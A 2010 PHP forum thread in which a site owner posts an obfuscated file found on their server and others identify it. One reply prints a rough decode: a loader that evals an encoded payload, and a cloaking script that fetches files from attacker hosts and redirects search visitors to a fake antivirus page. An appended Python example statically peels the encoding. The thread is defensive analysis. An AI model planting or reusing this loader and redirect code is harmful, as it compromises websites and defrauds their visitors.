What is this code?

Discussion in 'PHP' started by Axcell, Apr 23, 2010.

  1. #1
    I found a strange file in my server with this code.
    <?php
    $f816fa130fc23298137b344d4bd1c63d="\x62";$ce728c29f19b1f8ab33d4315a2d054ac="\x65";$m4863a3c77f25f5dccf4b60772fc8896="\x66";$pdf75c46b141cae275cfefbd894eab13="\x67";$ff07b835b7043a390217f21f5c1c5b3d="\x6d";$y801c76f2f7fbbf4de3759223c249e4f="\x6f";$l08178b3ca9c5b949dd8e839f1093cb3="\x6f";$l4591ab2c55a4629f9e01d7b21ca5214="\x6f";$m48aba6121b1aab8a41d75a9573c1877="\x6f";$ra871a69c309b784e1eb98ba0da6942b="\x73";$b60c93498e2b9505baeb837b71719bd4="\x73";$d5d963eb3055ab8267aa60c02061a697="\x73";$g5470888a4ebd419b4041630e6f94344="\x73";$f816fa130fc23298137b344d4bd1c63d.="\141";$ce728c29f19b1f8ab33d4315a2d054ac.="\162";$m4863a3c77f25f5dccf4b60772fc8896.="\151";$pdf75c46b141cae275cfefbd894eab13.="\172";$ff07b835b7043a390217f21f5c1c5b3d.="\144";$y801c76f2f7fbbf4de3759223c249e4f.="\142";$l08178b3ca9c5b949dd8e839f1093cb3.="\142";$l4591ab2c55a4629f9e01d7b21ca5214.="\142";$m48aba6121b1aab8a41d75a9573c1877.="\142";$ra871a69c309b784e1eb98ba0da6942b.="\164";$b60c93498e2b9505baeb837b71719bd4.="\164";$d5d963eb3055ab8267aa60c02061a697.="\164";$g5470888a4ebd419b4041630e6f94344.="\164";$f816fa130fc23298137b344d4bd1c63d.="\x73";$ce728c29f19b1f8ab33d4315a2d054ac.="\x65";$m4863a3c77f25f5dccf4b60772fc8896.="\x6c";$pdf75c46b141cae275cfefbd894eab13.="\x69";$ff07b835b7043a390217f21f5c1c5b3d.="\x35";$y801c76f2f7fbbf4de3759223c249e4f.="\x5f";$l08178b3ca9c5b949dd8e839f1093cb3.="\x5f";$l4591ab2c55a4629f9e01d7b21ca5214.="\x5f";$m48aba6121b1aab8a41d75a9573c1877.="\x5f";$ra871a69c309b784e1eb98ba0da6942b.="\x72";$b60c93498e2b9505baeb837b71719bd4.="\x72";$d5d963eb3055ab8267aa60c02061a697.="\x72";$g5470888a4ebd419b4041630e6f94344.="\x72";$f816fa130fc23298137b344d4bd1c63d.="\145";$ce728c29f19b1f8ab33d4315a2d054ac.="\147";$m4863a3c77f25f5dccf4b60772fc8896.="\145";$pdf75c46b141cae275cfefbd894eab13.="\156";$y801c76f2f7fbbf4de3759223c249e4f.="\145";$l08178b3ca9c5b949dd8e839f1093cb3.="\145";$l4591ab2c55a4629f9e01d7b21ca5214.="\147";$m48aba6121b1aab8a41d75a9573c1877.="\163";$ra871a69c309b784e1eb98ba0da6942b.=
"\137";$b60c93498e2b9505baeb837b71719bd4.="\137";$d5d963eb3055ab8267aa60c02061a697.="\160";$g5470888a4ebd419b4041630e6f94344.="\164";$f816fa130fc23298137b344d4bd1c63d.="\x36";$ce728c29f19b1f8ab33d4315a2d054ac.="\x5f";$m4863a3c77f25f5dccf4b60772fc8896.="\x5f";$pdf75c46b141cae275cfefbd894eab13.="\x66";$y801c76f2f7fbbf4de3759223c249e4f.="\x6e";$l08178b3ca9c5b949dd8e839f1093cb3.="\x6e";$l4591ab2c55a4629f9e01d7b21ca5214.="\x65";$m48aba6121b1aab8a41d75a9573c1877.="\x74";$ra871a69c309b784e1eb98ba0da6942b.="\x72";$b60c93498e2b9505baeb837b71719bd4.="\x72";$d5d963eb3055ab8267aa60c02061a697.="\x6f";$g5470888a4ebd419b4041630e6f94344.="\x6f";$f816fa130fc23298137b344d4bd1c63d.="\64";$ce728c29f19b1f8ab33d4315a2d054ac.="\162";$m4863a3c77f25f5dccf4b60772fc8896.="\147";$pdf75c46b141cae275cfefbd894eab13.="\154";$y801c76f2f7fbbf4de3759223c249e4f.="\144";$l08178b3ca9c5b949dd8e839f1093cb3.="\144";$l4591ab2c55a4629f9e01d7b21ca5214.="\164";$m48aba6121b1aab8a41d75a9573c1877.="\141";$ra871a69c309b784e1eb98ba0da6942b.="\145";$b60c93498e2b9505baeb837b71719bd4.="\157";$d5d963eb3055ab8267aa60c02061a697.="\163";$g5470888a4ebd419b4041630e6f94344.="\153";$f816fa130fc23298137b344d4bd1c63d.="\x5f";$ce728c29f19b1f8ab33d4315a2d054ac.="\x65";$m4863a3c77f25f5dccf4b60772fc8896.="\x65";$pdf75c46b141cae275cfefbd894eab13.="\x61";$y801c76f2f7fbbf4de3759223c249e4f.="\x5f";$l08178b3ca9c5b949dd8e839f1093cb3.="\x5f";$l4591ab2c55a4629f9e01d7b21ca5214.="\x5f";$m48aba6121b1aab8a41d75a9573c1877.="\x72";$ra871a69c309b784e1eb98ba0da6942b.="\x70";$b60c93498e2b9505baeb837b71719bd4.="\x74";$f816fa130fc23298137b344d4bd1c63d.="\144";$ce728c29f19b1f8ab33d4315a2d054ac.="\160";$m4863a3c77f25f5dccf4b60772fc8896.="\164";$pdf75c46b141cae275cfefbd894eab13.="\164";$y801c76f2f7fbbf4de3759223c249e4f.="\143";$l08178b3ca9c5b949dd8e839f1093cb3.="\146";$l4591ab2c55a4629f9e01d7b21ca5214.="\143";$m48aba6121b1aab8a41d75a9573c1877.="\164";$ra871a69c309b784e1eb98ba0da6942b.="\154";$b60c93498e2b9505baeb837b71719bd4.="\61";$f816fa130fc23298137b
344d4bd1c63d.="\x65";$ce728c29f19b1f8ab33d4315a2d054ac.="\x6c";$m4863a3c77f25f5dccf4b60772fc8896.="\x5f";$pdf75c46b141cae275cfefbd894eab13.="\x65";$y801c76f2f7fbbf4de3759223c249e4f.="\x6c";$l08178b3ca9c5b949dd8e839f1093cb3.="\x6c";$l4591ab2c55a4629f9e01d7b21ca5214.="\x6f";$ra871a69c309b784e1eb98ba0da6942b.="\x61";$b60c93498e2b9505baeb837b71719bd4.="\x33";$f816fa130fc23298137b344d4bd1c63d.="\143";$ce728c29f19b1f8ab33d4315a2d054ac.="\141";$m4863a3c77f25f5dccf4b60772fc8896.="\143";$y801c76f2f7fbbf4de3759223c249e4f.="\145";$l08178b3ca9c5b949dd8e839f1093cb3.="\165";$l4591ab2c55a4629f9e01d7b21ca5214.="\156";$ra871a69c309b784e1eb98ba0da6942b.="\143";$f816fa130fc23298137b344d4bd1c63d.="\x6f";$ce728c29f19b1f8ab33d4315a2d054ac.="\x63";$m4863a3c77f25f5dccf4b60772fc8896.="\x6f";$y801c76f2f7fbbf4de3759223c249e4f.="\x61";$l08178b3ca9c5b949dd8e839f1093cb3.="\x73";$l4591ab2c55a4629f9e01d7b21ca5214.="\x74";$ra871a69c309b784e1eb98ba0da6942b.="\x65";$f816fa130fc23298137b344d4bd1c63d.="\144";$ce728c29f19b1f8ab33d4315a2d054ac.="\145";$m4863a3c77f25f5dccf4b60772fc8896.="\156";$y801c76f2f7fbbf4de3759223c249e4f.="\156";$l08178b3ca9c5b949dd8e839f1093cb3.="\150";$l4591ab2c55a4629f9e01d7b21ca5214.="\145";$f816fa130fc23298137b344d4bd1c63d.="\x65";$m4863a3c77f25f5dccf4b60772fc8896.="\x74";$l4591ab2c55a4629f9e01d7b21ca5214.="\x6e";$m4863a3c77f25f5dccf4b60772fc8896.="\145";$l4591ab2c55a4629f9e01d7b21ca5214.="\164";$m4863a3c77f25f5dccf4b60772fc8896.="\x6e";$l4591ab2c55a4629f9e01d7b21ca5214.="\x73";$m4863a3c77f25f5dccf4b60772fc8896.="\164";$m4863a3c77f25f5dccf4b60772fc8896.="\x73";$m48aba6121b1aab8a41d75a9573c1877();if($ff07b835b7043a390217f21f5c1c5b3d($ce728c29f19b1f8ab33d4315a2d054ac("\x5c\50\x22\133\x30\55\x39\101\x2d\132\x61\55\x7a\134\x2b\57\x3d\135\x2a\42\x5c\51","\x28\42\x22\51",$ra871a69c309b784e1eb98ba0da6942b("\r\n","",$m4863a3c77f25f5dccf4b60772fc8896($g5470888a4ebd419b4041630e6f94344(__FILE__,"\x28")))))=="\x63\60\x32\61\x30\64\x65\64\x36\145\x39\65\x33\145\x33\62\x33\63\x61\143\x37\64\
x61\63\x64\61\x34\143\x32\145\x35\144"){@eval($pdf75c46b141cae275cfefbd894eab13($f816fa130fc23298137b344d4bd1c63d($b60c93498e2b9505baeb837b71719bd4("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"))));}$d5d963eb3055ab8267aa60c02061a697($l4591ab2c55a4629f9e01d7b21ca5214(),"\x64\141\x66\65\x34\141\x64\62\x31\61\x38\71\x34\71\x34\64\x61\141\x36\70\x64\60\x63\143\x35\60\x31\142\x65\67\x31\67")?$y801c76f2f7fbbf4de3759223c249e4f():$l08178b3ca9c5b949dd8e839f1093cb3();
    ?>
    
    Can someone decode it?
     
    Axcell, Apr 23, 2010 IP
  2. JAY6390

    #2
    To be honest, if you find strange code on your server you should just delete it. This could be malicious code.

    You shouldn't use third-party code without knowing what it is, and if you didn't put it there, chances are it's not good.
     
    JAY6390, Apr 23, 2010 IP
  3. raid

    #3
    Somebody may have hacked your site and uploaded that. I would delete it and find out where (or if it was a vulnerability). Good luck.
     
    raid, Apr 23, 2010 IP
  4. daddyG

    #4
    And don't forget to change your passwords after you delete this file.
     
    daddyG, Apr 23, 2010 IP
  5. Axcell

    #5
    I removed the file, but I'm curious what it is.
     
    Axcell, Apr 24, 2010 IP
  6. Taffy1957

    #6
    Hi guys, have just registered and stumbled straight upon this thread!

    Yes, it is malicious code & it is used to redirect a site user to a different but mirrored site for harvesting of personal info!
    I had the exact same thing 3 times last year, until I eventually switched web host. If you use Google AdSense you will eventually receive a warning from them & if not dealt with, they will de-index your site!
    One other thing I did, but not sure how effective it was, was to use my htaccess file in the root of my site to restrict access to the admin area & only allow access to my IP address.
    But either way I would delete that code ASAP & then request a username change from your host & also change your password.
    Keep a close eye on things for a week or two & pray they move on!
    You could also contact your hosting company and tell them you have experienced a code injection (that is what my host called it) & request they tighten up their security!

    Hope that helps

    PS. Check your web mail for bogus accounts also, I found 5 when I had this problem!
     
    Last edited: Apr 24, 2010
    Taffy1957, Apr 24, 2010 IP
  7. Brad33

    #7
    I just did a rough decode of this script manually.

    The main block of code:

    ob_start();
    if(md5(ereg_replace('\("[0-9A-Za-z\+/=]*"\)','("")',str_replace("\r\n","",file_get_contents(strtok(__FILE__,"(")))))=="c02104e46e953e3233ac74a3d14c2e5d"){
    @eval(gzinflate(base64_decode(str_rot13("[encoded script]"))));}
    strpos(ob_get_contents(),"daf54ad211894944aa68d0cc501be717")?ob_end_clean():ob_end_flush();
    Now, where I have it saying [encoded script] is another script that was encoded and I decoded manually (it's a rough decode so it probably won't execute).

    /*daf54ad211894944aa68d0cc501be717*/?>$timelimit) { $content = crawl_page("http://www.google.com/trends/hottrends?sa=X"); $fp = fopen($lndfile,"w+"); preg_match_all("#hottrends\?q=([^&]+)&#U", $content, $content_preg); foreach($content_preg[1] as $key) { $key = str_replace("+","-",$key); if (strlen($key) < 20) fwrite ($fp,"<a href=./".$key.".html>".str_replace("-"," ",$key)."</a><br>"); } fclose($fp); } return file_get_contents($lndfile); } function getTrends() { $timelimit = 60*60*3; $lndfile="./.cache/trends.txt"; if(!file_exists($lndfile)||time()-filemtime($lndfile)>$timelimit) { $address = "http://www.google.com/trends/hottrends?sa=X&date=".date("Y-m-d",time() - 60*60*24*3); $content = crawl_page($address); $address = "http://www.google.com/trends/hottrends?sa=X&date=".date("Y-m-d",time() - 60*60*24*2); $content .= crawl_page($address); $fp = fopen($lndfile,"w+"); preg_match_all("#hottrends\?q=([^&]+)&#U", $content, $content_preg); foreach($content_preg[1] as $key) { if (strlen($key) < 20) fwrite ($fp,"<a href=./".str_replace("+","-",$key).".html>".str_replace("+"," ",$key)."</a><br>"); } fclose($fp); } return file_get_contents($lndfile); } function getAdvKeys($key) { $timelimit = 60*60*3; $lndfile="./.cache/".$key."-adv.txt"; if(!file_exists($lndfile)||time()-filemtime($lndfile)>$timelimit) { $content = crawl_page("http://clients1.google.ru/complete/search?hl=en&q=".str_replace("-","+",$key)); $fp = fopen($lndfile,"w+"); preg_match_all("|\[([^]+),|si",$content, $content_preg, PREG_PATTERN_ORDER); foreach($content_preg[1] as $key) { fwrite ($fp,"<a href=./".str_replace(" ","-",$key).".html>".$key."</a><br>"); } fclose($fp); } return file_get_contents($lndfile); } function loadTemplate($template = "default.dot") { if (!$template) $template = "default.dot"; if (!file_exists($template) || !is_readable($template)) { die (print("LOAD_TEMPLATE")); return null; } $fh = fopen($template, "r"); $template = fread($fh, filesize($template)); return $template; } function 
getContent($key) { $lndfile="./.cache/".$key.".html"; if(!file_exists($lndfile)) { $key = str_replace("-","+",$key); $fp = fopen($lndfile,"w+"); $url="http://www.google.ru/search?client=firefox&num=100&hl=en&q=".$key."&lr=lang_en"; $result=crawl_page($url); preg_match_all("#<div class=s>(.*)<br>#U", $result, $result_preg); $s=array(); for ($i=0; $i<10; $j++) { $align = array("left", "right"); $links[$j] = "<img src="".$matches[1][$j]."" alt="".$key."" title="".$key."" align="".$align[rand(0,1)]."" />"; } for($i=0;$i<50;$i++){ if ($i%5==0) $c.=$links[$i/5]; $c.="<P>".$s[$i]."</P>"; } fwrite ($fp,$c); fclose($fp); } return file_get_contents($lndfile); } function init() { if(!file_exists(".htaccess")) { $file = crawl_page("http://pepelac.byethost4.com/htaccess"); $fp = fopen(".htaccess","w+"); fwrite ($fp,$file); fclose($fp); } if(!file_exists("style.css")) { $file = crawl_page("http://pepelac.byethost4.com/style"); $fp = fopen("style.css","w+"); fwrite ($fp,$file); fclose($fp); } if(!file_exists("default.dot")) { $file = crawl_page("http://pepelac.byethost4.com/default"); $fp = fopen("default.dot","w+"); fwrite ($fp,$file); fclose($fp); } return true; } function is_search_bots() { $ua = $_SERVER["HTTP_USER_AGENT"]; $htr = $_SERVER["HTTP_REFERER"]; $flag_g = stristr($ua, "googlebot"); $flag_y = stristr($ua, "slurp"); $flag_m = stristr($ua, "msnbot"); $isbot = false; if ($flag_g || $flag_y || $flag_m) { $isbot = true; $inf = date("Y-m-d H:i:s") . "|" . $ua . "|" . $_SERVER["REMOTE_ADDR"] . "|" . $_SERVER["REQUEST_URI"] . "
    "; $fp = fopen("stats.txt", "a"); fwrite($fp, $inf); fclose($fp); } if (!$isbot) { $flag_g = stristr($htr, "google"); $flag_s = stristr($htr, "search"); if (!$flag_g && !$flag_s) { $isbot = true; } } $zones = array(".AC", ".AD", ".AE", ".AERO", ".AF", ".AG", ".AI", ".AL", ".AM", ".AN", ".AO", ".AQ", ".AR", ".ARPA", ".AS", ".ASIA", ".AT", ".AU", ".AW", ".AX", ".AZ", ".BA", ".BB", ".BD", ".BE", ".BF", ".BG", ".BH", ".BI", ".BIZ", ".BJ", ".BM", ".BN", ".BO", ".BR", ".BS", ".BT", ".BV", ".BW", ".BY", ".BZ", ".CA", ".CAT", ".CC", ".CD", ".CF", ".CG", ".CH", ".CI", ".CK", ".CL", ".CM", ".CN", ".CO", ".COM", ".COOP", ".CR", ".CU", ".CV", ".CX", ".CY", ".CZ", ".DE", ".DJ", ".DK", ".DM", ".DO", ".DZ", ".EC", ".EDU", ".EE", ".EG", ".ER", ".ES", ".ET", ".EU", ".FI", ".FJ", ".FK", ".FM", ".FO", ".FR", ".GA", ".GB", ".GD", ".GE", ".GF", ".GG", ".GH", ".GI", ".GL", ".GM", ".GN", ".GOV", ".GP", ".GQ", ".GR", ".GS", ".GT", ".GU", ".GW", ".GY", ".HK", ".HM", ".HN", ".HR", ".HT", ".HU", ".ID", ".IE", ".IL", ".IM", ".IN", ".INFO", ".INT", ".IO", ".IQ", ".IR", ".IS", ".IT", ".JE", ".JM", ".JO", ".JOBS", ".JP", ".KE", ".KG", ".KH", ".KI", ".KM", ".KN", ".KP", ".KR", ".KW", ".KY", ".KZ", ".LA", ".LB", ".LC", ".LI", ".LK", ".LR", ".LS", ".LT", ".LU", ".LV", ".LY", ".MA", ".MC", ".MD", ".ME", ".MG", ".MH", ".MIL", ".MK", ".ML", ".MM", ".MN", ".MO", ".MOBI", ".MP", ".MQ", ".MR", ".MS", ".MT", ".MU", ".MUSEUM", ".MV", ".MW", ".MX", ".MY", ".MZ", ".NA", ".NAME", ".NC", ".NE", ".NET", ".NF", ".NG", ".NI", ".NL", ".NO", ".NP", ".NR", ".NU", ".NZ", ".OM", ".ORG", ".PA", ".PE", ".PF", ".PG", ".PH", ".PK", ".PL", ".PM", ".PN", ".PR", ".PRO", ".PS", ".PT", ".PW", ".PY", ".QA", ".RE", ".RO", ".RS", ".RU", ".RW", ".SA", ".SB", ".SC", ".SD", ".SE", ".SG", ".SH", ".SI", ".SJ", ".SK", ".SL", ".SM", ".SN", ".SO", ".SR", ".ST", ".SU", ".SV", ".SY", ".SZ", ".TC", ".TD", ".TEL", ".TF", ".TG", ".TH", ".TJ", ".TK", ".TL", ".TM", ".TN", ".TO", ".TP", ".TR", ".TT", ".TV", ".TW", ".TZ", ".UA", ".UG", ".UK", 
".US", ".UY", ".UZ", ".VA", ".VC", ".VE", ".VG", ".VI", ".VN", ".VU", ".WF", ".WS", ".YE", ".YT", ".YU", ".ZA", ".ZM", ".ZW"); if (!$isbot) { $tmp1 = explode("q=", $htr); $tmp2 = explode("&",$tmp1[1]); $kw = $tmp2[0]; for ($i=0; $i$timelimit){ $link = crawl_page("http://originalmix.co.cc/1.php"); $content = "<script type="text/javascript">new Image().src = "//counter.yadro.ru/hit;pepelac?r" + escape(document.referrer) + ((typeof(screen)=="undefined")?"" : ";s"+screen.width+"*"+screen.height+"*" + (screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ";u"+escape(document.URL) +  ";" +Math.random();</script>".chr(10); $content .= "<script>".chr(10)."document.write('<div style=position: absolute; top: 0; left: 0; width: 100%;  height: 100%;  background-color: #FFFFFF; padding: 0px></div>');".chr(10); $content .= "if (navigator.appVersion.indexOf(Mac)!=-1) window.location=;".chr(10); $content .= "else if (navigator.userAgent.indexOf(Firefox)!=-1) document.write('<div style=position: absolute; top: 0; left: 0; width: 100%;  height: 100%;  background-color: #FFFFFF; padding: 0px><iframe src= width=100% height=100%></iframe></div>');".chr(10); $content .= "else if (navigator.userAgent.indexOf(Chrome)!=-1) document.write('<div style=position: absolute; top: 0; left: 0; width: 100%;  height: 100%;  background-color: #FFFFFF; padding: 0px><iframe src= width=100% height=100%></iframe></div>');".chr(10); $content .= "else window.location=;".chr(10)."</script>".chr(10); $fp=fopen($lndfile,"w+");fwrite($fp,$content);fclose($fp);chmod ($lndfile, 0777); } else $content = file_get_contents($lndfile); $content = str_replace("&ttl=", "&q=".str_replace(" ", "+", $_GET["q"])."&ttl=", $content); return $content; } function countstat() { $inf = date("Y-m-d H:i:s") . "|" . $ua . "|" . $_SERVER["REMOTE_ADDR"] . "|" . $_SERVER["REQUEST_URI"] . "
    "; $fp = fopen("count.txt", "a"); fwrite($fp, $inf); fclose($fp); return true; } @mkdir("./.cache"); @chmod("./.cache", 0777); init(); countstat(); if ($q = $_GET["q"]) { if (is_search_bots()) { $q = str_replace("-", " ", $q); print sendPage($q); exit; } else { print redirect(); exit; } } else { header("HTTP/1.0 404 Not Found"); } ?>
    To me, it looks like what this script does is first it checks Google for hot trending topics and gets related keywords, then it makes a bunch of links on the page linking to those keywords, probably to get indexed by a search engine. Then, when a user clicks one of the keywords, it sends them to a rogue fake antivirus scanner page. It also hides itself from regular users clicking and returns a 404 Not Found error, unless it detects you're a search crawler bot, then it shows you a page with links. Those links are indexed and when someone clicks a fake link in Google, it pulls the URL from http://originalmix.co.cc/1.php and sends the user there.

    It pulls data from the following sites:

    http://pepelac.byethost4.com/htaccess
    http://pepelac.byethost4.com/style
    http://pepelac.byethost4.com/default
    http://originalmix.co.cc/1.php

    (And google of course)

    Feel free to correct me, I only took a quick look at it.

    Definitely malicious.
     
    Last edited: Apr 24, 2010
    Brad33, Apr 24, 2010 IP
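
Added example (not part of the thread and not code from the file Axcell found): a static way to reproduce the two steps of Brad33's manual decode, first rebuilding the function names from the hex and octal string pieces, then peeling the str_rot13, base64_decode and gzinflate layers, without running any PHP. The stub, its variable names `$g`, `$b`, `$s`, the helper names and the packed test string are constructed for illustration.

```python
import base64, codecs, re, zlib

# Constructed stub in the style of the posted file (short names, placeholder payload).
SAMPLE = r'''<?php
$g="\x67";$b="\x62";$s="\x73";$g.="\172";$b.="\141";$s.="\164";$g.="\x69";
$b.="\x73";$s.="\x72";$g.="\156";$b.="\145";$s.="\137";$g.="\x66";$b.="\x36";
$s.="\x72";$g.="\154";$b.="\64";$s.="\157";$g.="\x61";$b.="\x5f";$s.="\x74";
$g.="\164";$b.="\144";$s.="\61";$g.="\x65";$b.="\x65";$s.="\x33";$b.="\143";
$b.="\x6f";$b.="\144";$b.="\x65";@eval($g($b($s("[encoded script]"))));
'''

ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
ASSIGN = re.compile(r'\$(\w+)\s*(\.?=)\s*"((?:[^"\\]|\\.)*)"\s*;')

def unescape(lit):
    # Resolve PHP hex (\xNN) and octal (\NNN) escapes statically; nothing is executed.
    def one(m):
        return chr(int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF)
    return ESCAPE.sub(one, lit)

def resolve_names(src):
    # Replay every `$v="..."` / `$v.="..."` statement to see what each variable spells.
    names = {}
    for var, op, lit in ASSIGN.findall(src):
        names[var] = (names.get(var, '') if op == '.=' else '') + unescape(lit)
    return names

def substitute(src, names):
    # Put the recovered function names back at the `$var(` call sites.
    return re.sub(r'\$(\w+)(?=\s*\()', lambda m: names.get(m.group(1), m.group(0)), src)

def unwrap(blob):
    # Undo the layers in the order the loader applies them:
    # str_rot13, then base64_decode, then gzinflate (raw DEFLATE, wbits=-15).
    raw = base64.b64decode(codecs.decode(blob, 'rot13'))
    return zlib.decompress(raw, -15).decode('utf-8', 'replace')

def pack_sample(text):
    # Build a constructed, harmless blob with the same three layers for the demo.
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = c.compress(text.encode()) + c.flush()
    return codecs.encode(base64.b64encode(raw).decode(), 'rot13')

if __name__ == '__main__':
    names = resolve_names(SAMPLE)
    print(names)
    print(substitute(SAMPLE, names).splitlines()[-1])
    print(unwrap(pack_sample('echo "constructed sample";')))
```

The output of `unwrap()` is only ever treated as text, so a quarantined copy of a suspicious file can be inspected this way without a PHP interpreter being involved.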